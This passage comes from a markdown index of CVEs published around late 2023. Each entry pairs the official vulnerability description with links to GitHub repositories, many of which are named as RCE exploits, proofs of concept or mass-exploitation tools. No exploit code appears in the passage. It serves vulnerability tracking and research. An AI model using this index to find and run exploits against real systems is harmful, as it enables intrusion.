An issue in minCal v.1.0.0 allows a remote attacker to execute arbitrary code via a crafted script to the customer_data parameter.

- [mr-xmen786/CVE-2023-46478](https://github.com/mr-xmen786/CVE-2023-46478)

### CVE-2023-46480 (2023-11-27)

An issue in OwnCast v.0.1.1 allows a remote attacker to execute arbitrary code and obtain sensitive information via the authHost parameter of the indieauth function.

- [shahzaibak96/CVE-2023-46480](https://github.com/shahzaibak96/CVE-2023-46480)

### CVE-2023-46501 (2023-11-07)

An issue in BoltWire v.6.03 allows a remote attacker to obtain sensitive information via a crafted payload to the view and change admin password function.

- [Cyber-Wo0dy/CVE-2023-46501](https://github.com/Cyber-Wo0dy/CVE-2023-46501)

### CVE-2023-46604 (2023-10-27)

The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath.

Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.

- [trganda/ActiveMQ-RCE](https://github.com/trganda/ActiveMQ-RCE)
- [X1r0z/ActiveMQ-RCE](https://github.com/X1r0z/ActiveMQ-RCE)
- [JaneMandy/ActiveMQ_RCE_Pro_Max](https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max)
- [SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ)
- [evkl1d/CVE-2023-46604](https://github.com/evkl1d/CVE-2023-46604)
- [sule01u/CVE-2023-46604](https://github.com/sule01u/CVE-2023-46604)
- [justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp](https://github.com/justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp)
- [h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up](https://github.com/h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up)
- [duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell](https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell)
- [vjayant93/CVE-2023-46604-POC](https://github.com/vjayant93/CVE-2023-46604-POC)
- [LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence](https://github.com/LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence)
- [NKeshawarz/CVE-2023-46604-RCE](https://github.com/NKeshawarz/CVE-2023-46604-RCE)
- [minhangxiaohui/ActiveMQ_CVE-2023-46604](https://github.com/minhangxiaohui/ActiveMQ_CVE-2023-46604)
- [nitzanoligo/CVE-2023-46604-demo](https://github.com/nitzanoligo/CVE-2023-46604-demo)
- [tomasmussi-mulesoft/activemq-cve-2023-46604](https://github.com/tomasmussi-mulesoft/activemq-cve-2023-46604)
- [dcm2406/CVE-Lab](https://github.com/dcm2406/CVE-Lab)
- [mrpentst/CVE-2023-46604](https://github.com/mrpentst/CVE-2023-46604)
- [dcm2406/CVE-2023-46604](https://github.com/dcm2406/CVE-2023-46604)
- [Mudoleto/Broker_ApacheMQ](https://github.com/Mudoleto/Broker_ApacheMQ)
- [hh-hunter/cve-2023-46604](https://github.com/hh-hunter/cve-2023-46604)
- [stegano5/ExploitScript-CVE-2023-46604](https://github.com/stegano5/ExploitScript-CVE-2023-46604)
- [Arlenhiack/ActiveMQ-RCE-Exploit](https://github.com/Arlenhiack/ActiveMQ-RCE-Exploit)
- [vulncheck-oss/cve-2023-46604](https://github.com/vulncheck-oss/cve-2023-46604)
- [thinkycx/activemq-rce-cve-2023-46604](https://github.com/thinkycx/activemq-rce-cve-2023-46604)
- [mranv/honeypot.rs](https://github.com/mranv/honeypot.rs)
- [pulentoski/CVE-2023-46604](https://github.com/pulentoski/CVE-2023-46604)
- [cuanh2333/CVE-2023-46604](https://github.com/cuanh2333/CVE-2023-46604)

### CVE-2023-46615 (2024-02-12)

Deserialization of Untrusted Data vulnerability in Kalli Dan. KD Coming Soon. This issue affects KD Coming Soon: from n/a through 1.7.

- [RandomRobbieBF/CVE-2023-46615](https://github.com/RandomRobbieBF/CVE-2023-46615)

### CVE-2023-46694 (-)

Vtenext 21.02 allows an authenticated attacker to upload arbitrary files, potentially enabling them to execute remote commands. This flaw exists due to the application's failure to enforce proper authentication controls when accessing the Ckeditor file manager functionality.

- [invisiblebyte/CVE-2023-46694](https://github.com/invisiblebyte/CVE-2023-46694)

### CVE-2023-46747 (2023-10-26)

Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

- [bijaysenihang/CVE-2023-46747-Mass-RCE](https://github.com/bijaysenihang/CVE-2023-46747-Mass-RCE)
- [W01fh4cker/CVE-2023-46747-RCE](https://github.com/W01fh4cker/CVE-2023-46747-RCE)
- [fu2x2000/CVE-2023-46747](https://github.com/fu2x2000/CVE-2023-46747)
- [maniak-academy/Mitigate-CVE-2023-46747](https://github.com/maniak-academy/Mitigate-CVE-2023-46747)
- [y4v4z/CVE-2023-46747-POC](https://github.com/y4v4z/CVE-2023-46747-POC)
- [nvansluis/test_cve-2023-46747](https://github.com/nvansluis/test_cve-2023-46747)
- [RevoltSecurities/CVE-2023-46747](https://github.com/RevoltSecurities/CVE-2023-46747)
- [vidura2/cve-2023-46747](https://github.com/vidura2/cve-2023-46747)
- [rainbowhatrkn/CVE-2023-46747-RCE](https://github.com/rainbowhatrkn/CVE-2023-46747-RCE)
- [AMELYA13/CVE-2023-46747-Mass-RCE](https://github.com/AMELYA13/CVE-2023-46747-Mass-RCE)
- [MacTavish2/CVE-2023-46747-Mass-RCE](https://github.com/MacTavish2/CVE-2023-46747-Mass-RCE)
- [zgimszhd61/CVE-2023-46747-RCE-poc](https://github.com/zgimszhd61/CVE-2023-46747-RCE-poc)

### CVE-2023-46805 (2024-01-12)

An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

- [yoryio/CVE-2023-46805](https://github.com/yoryio/CVE-2023-46805)
- [cbeek-r7/CVE-2023-46805](https://github.com/cbeek-r7/CVE-2023-46805)
- [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887)
- [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887)
- [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan)
- [Chocapikk/CVE-2023-46805](https://github.com/Chocapikk/CVE-2023-46805)
- [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped)
- [w2xim3/CVE-2023-46805](https://github.com/w2xim3/CVE-2023-46805)

### CVE-2023-46813 (2023-10-27)

An issue was discovered in the Linux kernel before 6.5.9, exploitable by local users with userspace access to MMIO registers. Incorrect access checking in the #VC handler and instruction emulation of the SEV-ES emulation of MMIO accesses could lead to arbitrary write access to kernel memory (and thus privilege escalation). This depends on a race condition through which userspace can replace an instruction before the #VC handler reads it.

- [Freax13/cve-2023-46813-poc](https://github.com/Freax13/cve-2023-46813-poc)

### CVE-2023-46818 (2023-10-27)

An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.

- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)

### CVE-2023-46865 (2023-10-30)

/api/v1/company/upload-logo in CompanyController.php in crater through 6.0.6 allows a superadmin to execute arbitrary PHP code by placing this code into an image/png IDAT chunk of a Company Logo image.

- [asylumdx/Crater-CVE-2023-46865-RCE](https://github.com/asylumdx/Crater-CVE-2023-46865-RCE)

### CVE-2023-46870 (-)

extcap/nrf_sniffer_ble.py, extcap/nrf_sniffer_ble.sh, extcap/SnifferAPI/*.py in Nordic Semiconductor nRF Sniffer for Bluetooth LE 3.0.0, 3.1.0, 4.0.0, 4.1.0, and 4.1.1 have incorrect file permissions set, which allows attackers to achieve code execution via modified bash and python scripts.

- [Chapoly1305/CVE-2023-46870](https://github.com/Chapoly1305/CVE-2023-46870)

### CVE-2023-46948
- [AzraelsBlade/CVE-2023-46948](https://github.com/AzraelsBlade/CVE-2023-46948)

### CVE-2023-46954 (2023-11-03)

SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter.

- [jakedmurphy1/CVE-2023-46954](https://github.com/jakedmurphy1/CVE-2023-46954)

### CVE-2023-46974 (2023-12-07)

Cross Site Scripting vulnerability in Best Courier Management System v.1.000 allows a remote attacker to execute arbitrary code via a crafted payload to the page parameter in the URL.

- [yte121/CVE-2023-46974](https://github.com/yte121/CVE-2023-46974)

### CVE-2023-46980 (2023-11-03)

An issue in Best Courier Management System v.1.0 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted script to the userID parameter.

- [sajaljat/CVE-2023-46980](https://github.com/sajaljat/CVE-2023-46980)

### CVE-2023-46998 (2023-11-07)

Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions.

- [soy-oreocato/CVE-2023-46998](https://github.com/soy-oreocato/CVE-2023-46998)

### CVE-2023-47014 (2023-11-22)

A Cross-Site Request Forgery (CSRF) vulnerability in Sourcecodester Sticky Notes App Using PHP with Source Code v.1.0 allows a local attacker to obtain sensitive information via a crafted payload to add-note.php.

- [emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS](https://github.com/emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS)

### CVE-2023-47102 (2023-11-07)

UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.

- [nitipoom-jar/CVE-2023-47102](https://github.com/nitipoom-jar/CVE-2023-47102)

### CVE-2023-47108 (2023-11-10)

OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go. Prior to version 0.46.0, the grpc Unary Server Interceptor out of the box adds labels `net.peer.sock.addr` and `net.peer.sock.port` that have unbound cardinality. It leads to the server's potential memory exhaustion when many malicious requests are sent. An attacker can easily flood the peer address and port for requests. Version 0.46.0 contains a fix for this issue. As a workaround to stop being affected, a view removing the attributes can be used. The other possibility is to disable grpc metrics instrumentation by passing `otelgrpc.WithMeterProvider` option with `noop.NewMeterProvider`.

- [bahe-msft/govuln-CVE-2023-47108](https://github.com/bahe-msft/govuln-CVE-2023-47108)

### CVE-2023-47119 (2023-11-10)

Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, some links can inject arbitrary HTML tags when rendered through our Onebox engine. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. There are no known workarounds.

- [BaadMaro/CVE-2023-47119](https://github.com/BaadMaro/CVE-2023-47119)
- [Cristiano100/CVE-2023-47119](https://github.com/Cristiano100/CVE-2023-47119)

### CVE-2023-47129 (2023-11-10)

Statmic is a core Laravel content management system Composer package. Prior to versions 3.4.13 and 4.33.0, on front-end forms with an asset upload field, PHP files crafted to look like images may be uploaded. This only affects forms using the "Forms" feature and not just _any_ arbitrary form. This does not affect the control panel. This issue has been patched in 3.4.13 and 4.33.0.

- [Cyber-Wo0dy/CVE-2023-47129](https://github.com/Cyber-Wo0dy/CVE-2023-47129)

### CVE-2023-47179
- [RandomRobbieBF/CVE-2023-47179](https://github.com/RandomRobbieBF/CVE-2023-47179)

### CVE-2023-47218 (2024-02-13)

An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.

We have already fixed the vulnerability in the following versions:

- QTS 5.1.5.2645 build 20240116 and later
- QuTS hero h5.1.5.2647 build 20240118 and later
- QuTScloud c5.1.5.2651 and later

- [passwa11/CVE-2023-47218](https://github.com/passwa11/CVE-2023-47218)

### CVE-2023-47246 (2023-11-10)

In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.

- [W01fh4cker/CVE-2023-47246-EXP](https://github.com/W01fh4cker/CVE-2023-47246-EXP)
- [rainbowhatrkn/CVE-2023-47246](https://github.com/rainbowhatrkn/CVE-2023-47246)
- [tucommenceapousser/CVE-2023-47246](https://github.com/tucommenceapousser/CVE-2023-47246)

### CVE-2023-47253 (2023-11-06)

Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter.

- [OpenXP-Research/CVE-2023-47253](https://github.com/OpenXP-Research/CVE-2023-47253)
- [gmh5225/CVE-2023-47253](https://github.com/gmh5225/CVE-2023-47253)

### CVE-2023-47355 (2024-02-05)

The com.eypcnnapps.quickreboot (aka Eyuep Can Yilmaz [ROOT] Quick Reboot) application 1.0.8 for Android has exposed broadcast receivers for PowerOff, Reboot, and Recovery (e.g., com.eypcnnapps.quickreboot.widget.PowerOff) that are susceptible to unauthorized broadcasts because of missing input validation.

- [actuator/com.eypcnnapps.quickreboot](https://github.com/actuator/com.eypcnnapps.quickreboot)

### CVE-2023-47400
- [LucasVanHaaren/CVE-2023-47400](https://github.com/LucasVanHaaren/CVE-2023-47400)

### CVE-2023-47437 (2023-11-27)

A vulnerability has been identified in Pachno 1.0.6 allowing an authenticated attacker to execute a cross-site scripting (XSS) attack. The vulnerability exists due to inadequate input validation in the Project Description and comments, which enables an attacker to inject malicious JavaScript.

- [herombey/CVE-2023-47437](https://github.com/herombey/CVE-2023-47437)

### CVE-2023-47459 (2024-01-16)

An issue in Knovos Discovery v.22.67.0 allows a remote attacker to obtain sensitive information via the /DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName component.

- [aleksey-vi/CVE-2023-47459](https://github.com/aleksey-vi/CVE-2023-47459)

### CVE-2023-47460 (2024-01-16)

SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component.

- [aleksey-vi/CVE-2023-47460](https://github.com/aleksey-vi/CVE-2023-47460)

### CVE-2023-47464 (2023-11-30)

Insecure Permissions vulnerability in GL.iNet AX1800 version 4.0.0 before 4.5.0 allows a remote attacker to execute arbitrary code via the upload API function.

- [HadessCS/CVE-2023-47464](https://github.com/HadessCS/CVE-2023-47464)

### CVE-2023-47488 (2023-11-09)

Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page.

- [nitipoom-jar/CVE-2023-47488](https://github.com/nitipoom-jar/CVE-2023-47488)

### CVE-2023-47489 (2023-11-09)

CSV injection in export as csv in Combodo iTop v.3.1.0-2-11973 allows a local attacker to execute arbitrary code via a crafted script to the export-v2.php and ajax.render.php components.

- [nitipoom-jar/CVE-2023-47489](https://github.com/nitipoom-jar/CVE-2023-47489)

### CVE-2023-47504 (2024-04-24)

Improper Authentication vulnerability in Elementor Elementor Website Builder allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Elementor Website Builder: from n/a through 3.16.4.

- [davidxbors/CVE-2023-47504-POC](https://github.com/davidxbors/CVE-2023-47504-POC)

### CVE-2023-47529 (2023-11-23)

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in ThemeIsle Cloud Templates & Patterns collection. This issue affects Cloud Templates & Patterns collection: from n/a through 1.2.2.

- [RandomRobbieBF/CVE-2023-47529](https://github.com/RandomRobbieBF/CVE-2023-47529)

### CVE-2023-47564 (2024-02-02)

An incorrect permission assignment for critical resource vulnerability has been reported to affect Qsync Central. If exploited, the vulnerability could allow authenticated users to read or modify the resource via a network.

We have already fixed the vulnerability in the following versions:

- Qsync Central 4.4.0.15 (2024/01/04) and later
- Qsync Central 4.3.0.11 (2024/01/11) and later

- [C411e/CVE-2023-47564](https://github.com/C411e/CVE-2023-47564)

### CVE-2023-47668 (2023-11-23)

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in StellarWP Membership Plugin – Restrict Content plugin <= 3.2.7 versions.

- [RandomRobbieBF/CVE-2023-47668](https://github.com/RandomRobbieBF/CVE-2023-47668)

### CVE-2023-47840 (2023-12-29)

Improper Control of Generation of Code ('Code Injection') vulnerability in Qode Interactive Qode Essential Addons. This issue affects Qode Essential Addons: from n/a through 1.5.2.

- [RandomRobbieBF/CVE-2023-47840](https://github.com/RandomRobbieBF/CVE-2023-47840)

### CVE-2023-47882 (2023-12-27)

The Kami Vision YI IoT com.yunyi.smartcamera application through 4.1.9_20231127 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component.

- [actuator/yi](https://github.com/actuator/yi)

### CVE-2023-47883 (2023-12-27)

The com.altamirano.fabricio.tvbrowser TV browser application through 4.5.1 for Android is vulnerable to JavaScript code execution via an explicit intent due to an exposed MainActivity.

- [actuator/com.altamirano.fabricio.tvbrowser](https://github.com/actuator/com.altamirano.fabricio.tvbrowser)

### CVE-2023-47889 (2024-02-06)

The Android application BINHDRM26 com.bdrm.superreboot 1.0.3 exposes several critical actions through its exported broadcast receivers. These exposed actions can allow any app on the device to send unauthorized broadcasts, leading to unintended consequences. The vulnerability is particularly concerning because these actions include powering off, system reboot & entering recovery mode.

- [actuator/com.bdrm.superreboot](https://github.com/actuator/com.bdrm.superreboot)

### CVE-2023-48022 (2023-11-28)

Anyscale Ray 2.6.3 and 2.8.0 allows a remote attacker to execute arbitrary code via the job submission API. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment.

- [0x656565/CVE-2023-48022](https://github.com/0x656565/CVE-2023-48022)
- [jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022](https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022)

### CVE-2023-48028 (2023-11-17)

kodbox 1.46.01 has a security flaw that enables user enumeration. This problem is present on the login page, where an attacker can identify valid users based on varying response messages, potentially paving the way for a brute force attack.

- [nitipoom-jar/CVE-2023-48028](https://github.com/nitipoom-jar/CVE-2023-48028)

### CVE-2023-48029 (2023-11-17)

Corebos 8.0 and below is vulnerable to CSV Injection. An attacker with low privileges can inject a malicious command into a table. This vulnerability is exploited when an administrator visits the user management section, exports the data to a CSV file, and then opens it, leading to the execution of the malicious payload on the administrator's computer.

- [nitipoom-jar/CVE-2023-48029](https://github.com/nitipoom-jar/CVE-2023-48029)

### CVE-2023-48031 (2023-11-17)

OpenSupports v4.11.0 is vulnerable to Unrestricted Upload of File with Dangerous Type. In the comment function, an attacker can bypass security restrictions and upload a .bat file by manipulating the file's magic bytes to masquerade as an allowed type. This can enable the attacker to execute arbitrary code or establish a reverse shell, leading to unauthorized file writes or control over the victim's station via a crafted file upload operation.

- [nitipoom-jar/CVE-2023-48031](https://github.com/nitipoom-jar/CVE-2023-48031)

### CVE-2023-48034 (2023-11-27)

An issue discovered in Acer Wireless Keyboard SK-9662 allows an attacker in physical proximity to both decrypt wireless keystrokes and inject arbitrary keystrokes via use of weak encryption.

- [aprkr/CVE-2023-48034](https://github.com/aprkr/CVE-2023-48034)

### CVE-2023-48084 (2023-12-14)

Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool.

- [Hamibubu/CVE-2023-48084](https://github.com/Hamibubu/CVE-2023-48084)
- [bucketcat/CVE-2023-48084](https://github.com/bucketcat/CVE-2023-48084)

### CVE-2023-48104 (2024-01-16)

Alinto SOGo before 5.9.1 is vulnerable to HTML Injection.

- [E1tex/CVE-2023-48104](https://github.com/E1tex/CVE-2023-48104)

### CVE-2023-48123 (2023-12-06)

An issue in Netgate pfSense Plus v.23.05.1 and before and pfSense CE v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the packet_capture.php file.

- [NHPT/CVE-2023-48123](https://github.com/NHPT/CVE-2023-48123)

### CVE-2023-48194 (2024-07-09)

Vulnerability in Tenda AC8v4 .V16.03.34.09 due to sscanf and the last digit of s8 being overwritten with \x0. After executing set_client_qos, control over the gp register can be obtained.

- [zt20xx/CVE-2023-48194](https://github.com/zt20xx/CVE-2023-48194)

### CVE-2023-48197 (2023-11-15)

Cross-Site Scripting (XSS) vulnerability in the ‘manageApiKeys’ component of Grocy 4.0.3 and earlier allows attackers to obtain victim's cookies when the victim clicks on the "see QR code" function.

- [nitipoom-jar/CVE-2023-48197](https://github.com/nitipoom-jar/CVE-2023-48197)

### CVE-2023-48198 (2023-11-15)

A Cross-Site Scripting (XSS) vulnerability in the 'product description' component within '/api/stock/products' of Grocy version <= 4.0.3 allows attackers to obtain a victim's cookies.

- [nitipoom-jar/CVE-2023-48198](https://github.com/nitipoom-jar/CVE-2023-48198)

### CVE-2023-48199 (2023-11-15)

HTML Injection vulnerability in the 'manageApiKeys' component in Grocy <= 4.0.3 allows attackers to inject arbitrary HTML content without script execution. This occurs when user-supplied data is not appropriately sanitized, enabling the injection of HTML tags through parameter values. The attacker can then manipulate page content in the QR code detail popup, often coupled with social engineering tactics, exploiting both the trust of users and the application's lack of proper input handling.

- [nitipoom-jar/CVE-2023-48199](https://github.com/nitipoom-jar/CVE-2023-48199)

### CVE-2023-48200 (2023-11-15)

Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component.

- [nitipoom-jar/CVE-2023-48200](https://github.com/nitipoom-jar/CVE-2023-48200)

### CVE-2023-48777 (2024-03-26)

Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder. This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.

- [AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777](https://github.com/AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777)

### CVE-2023-48788 (2024-03-12)

An improper neutralization of special elements used in an SQL command ('SQL injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows an attacker to execute unauthorized code or commands via specially crafted packets.

- [horizon3ai/CVE-2023-48788](https://github.com/horizon3ai/CVE-2023-48788)

### CVE-2023-48842 (2023-12-01)

D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at hedwig.cgi.

- [creacitysec/CVE-2023-48842](https://github.com/creacitysec/CVE-2023-48842)

### CVE-2023-48849 (2023-12-06)

Ruijie EG Series Routers version EG_3.0(1)B11P216 and before allows unauthenticated attackers to remotely execute arbitrary code due to incorrect filtering.

- [delsploit/CVE-2023-48849](https://github.com/delsploit/CVE-2023-48849)

### CVE-2023-48858 (2024-01-17)

A Cross-site scripting (XSS) vulnerability in login page php code in Armex ABO.CMS 5.9 allows remote attackers to inject arbitrary web script or HTML via the login.php? URL part.

- [Shumerez/CVE-2023-48858](https://github.com/Shumerez/CVE-2023-48858)

### CVE-2023-48866 (2023-12-04)

A Cross-Site Scripting (XSS) vulnerability in the recipe preparation component within /api/objects/recipes and note component within /api/objects/shopping_lists/ of Grocy <= 4.0.3 allows attackers to obtain the victim's cookies.

- [nitipoom-jar/CVE-2023-48866](https://github.com/nitipoom-jar/CVE-2023-48866)

### CVE-2023-48974 (2024-02-08)

Cross Site Scripting vulnerability in Axigen WebMail prior to 10.3.3.61 allows a remote attacker to escalate privileges via a crafted script to the serverName_input parameter.

- [vinnie1717/CVE-2023-48974](https://github.com/vinnie1717/CVE-2023-48974)

### CVE-2023-48981
- [tristao-marinho/CVE-2023-48981](https://github.com/tristao-marinho/CVE-2023-48981)

### CVE-2023-48982
- [tristao-marinho/CVE-2023-48982](https://github.com/tristao-marinho/CVE-2023-48982)

### CVE-2023-48983
- [tristao-marinho/CVE-2023-48983](https://github.com/tristao-marinho/CVE-2023-48983)

### CVE-2023-49002 (2023-12-27)

An issue in Xenom Technologies (sinous) Phone Dialer-voice Call Dialer v.1.2.5 allows an attacker to bypass intended access restrictions via interaction with com.funprime.calldialer.ui.activities.OutgoingActivity.

- [actuator/com.sinous.voice.dialer](https://github.com/actuator/com.sinous.voice.dialer)

### CVE-2023-49003 (2023-12-27)

An issue in simplemobiletools Simple Dialer 5.18.1 allows an attacker to bypass intended access restrictions via interaction with com.simplemobiletools.dialer.activities.DialerActivity.

- [actuator/com.simplemobiletools.dialer](https://github.com/actuator/com.simplemobiletools.dialer)

### CVE-2023-49038 (2024-01-29)

Command injection in the ping utility on Buffalo LS210D 1.78-0.03 allows a remote authenticated attacker to inject arbitrary commands onto the NAS as root.

- [christopher-pace/CVE-2023-49038](https://github.com/christopher-pace/CVE-2023-49038)

### CVE-2023-49052 (2023-11-30)

File Upload vulnerability in Microweber v.2.0.4 allows a remote attacker to execute arbitrary code via a crafted script to the file upload function in the created forms component.

- [Cyber-Wo0dy/CVE-2023-49052](https://github.com/Cyber-Wo0dy/CVE-2023-49052)

### CVE-2023-49070 (2023-12-05)

Pre-auth RCE in Apache OFBiz 18.12.09.

It is due to the XML-RPC component, which is no longer maintained but still present.
This issue affects Apache OFBiz: before 18.12.10.
Users are recommended to upgrade to version 18.12.10.

- [abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC](https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC)
- [0xrobiul/CVE-2023-49070](https://github.com/0xrobiul/CVE-2023-49070)
- [D0g3-8Bit/OFBiz-Attack](https://github.com/D0g3-8Bit/OFBiz-Attack)
- [UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz](https://github.com/UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz)
- [yukselberkay/CVE-2023-49070_CVE-2023-51467](https://github.com/yukselberkay/CVE-2023-49070_CVE-2023-51467)
- [Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467](https://github.com/Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467)

### CVE-2023-49103 (2023-11-21)

An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system. Therefore, even if ownCloud is not running in a containerized environment, this vulnerability should still be a cause for concern. Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure.

- [creacitysec/CVE-2023-49103](https://github.com/creacitysec/CVE-2023-49103)
- [merlin-ke/OwnCloud-CVE-2023-49103](https://github.com/merlin-ke/OwnCloud-CVE-2023-49103)
- [d0rb/CVE-2023-49103](https://github.com/d0rb/CVE-2023-49103)

### CVE-2023-49105 (2023-11-21)

An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.

- [ambionics/owncloud-exploits](https://github.com/ambionics/owncloud-exploits)

### CVE-2023-49313 (2023-11-28)

A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.

- [louiselalanne/CVE-2023-49313](https://github.com/louiselalanne/CVE-2023-49313)

### CVE-2023-49314 (2023-11-28)

Asana Desktop 2.1.0 on macOS allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode and EnableNodeCliInspectArguments, and thus r3ggi/electroniz3r can be used to perform an attack.

- [louiselalanne/CVE-2023-49314](https://github.com/louiselalanne/CVE-2023-49314)

### CVE-2023-49339 (2024-02-13)

Ellucian Banner 9.17 allows Insecure Direct Object Reference (IDOR) via a modified bannerId to the /StudentSelfService/ssb/studentCard/retrieveData endpoint.

- [3zizme/CVE-2023-49339](https://github.com/3zizme/CVE-2023-49339)

### CVE-2023-49438 (2023-12-26)

An open redirect vulnerability in the python package Flask-Security-Too <=5.3.2 allows attackers to redirect unsuspecting users to malicious sites via a crafted URL by abusing the ?next parameter on the /login and /register routes.

- [brandon-t-elliott/CVE-2023-49438](https://github.com/brandon-t-elliott/CVE-2023-49438)

### CVE-2023-49453 (2024-03-12)

Reflected cross-site scripting (XSS) vulnerability in Racktables v0.22.0 and before, allows local attackers to execute arbitrary code and obtain sensitive information via the search component in index.php.

- [nitipoom-jar/CVE-2023-49453](https://github.com/nitipoom-jar/CVE-2023-49453)

### CVE-2023-49471 (2024-01-10)

Blind Server-Side Request Forgery (SSRF) vulnerability in karlomikus Bar Assistant before version 3.2.0 does not validate a parameter before making a request through Image::make(), which could allow authenticated remote attackers to execute arbitrary code.

- [zunak/CVE-2023-49471](https://github.com/zunak/CVE-2023-49471)

### CVE-2023-49496
- [HuangYanQwQ/CVE-2023-49496](https://github.com/HuangYanQwQ/CVE-2023-49496)

### CVE-2023-49539 (2024-03-01)

